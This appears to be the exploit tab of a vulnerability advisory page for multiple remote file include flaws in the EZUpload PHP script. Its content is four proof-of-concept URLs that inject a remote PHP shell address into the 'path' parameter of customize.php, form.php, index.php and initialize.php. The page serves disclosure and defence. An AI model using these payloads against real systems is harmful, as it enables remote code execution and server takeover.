• info
• discussion
• exploit
• solution
• references

EZUpload Multiple Remote File Include Vulnerabilities

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/ezupload/customize.php?path=http://www.example.com/phpshell?&
http://www.example.com/ezupload/form.php?path=http://www.example.com/phpshell?&
http://www.example.com/ezupload/index.php?path=http://www.example.com/phpshell?&
http://www.example.com/ezupload/initialize.php?path=http://www.example.com/phpshell?&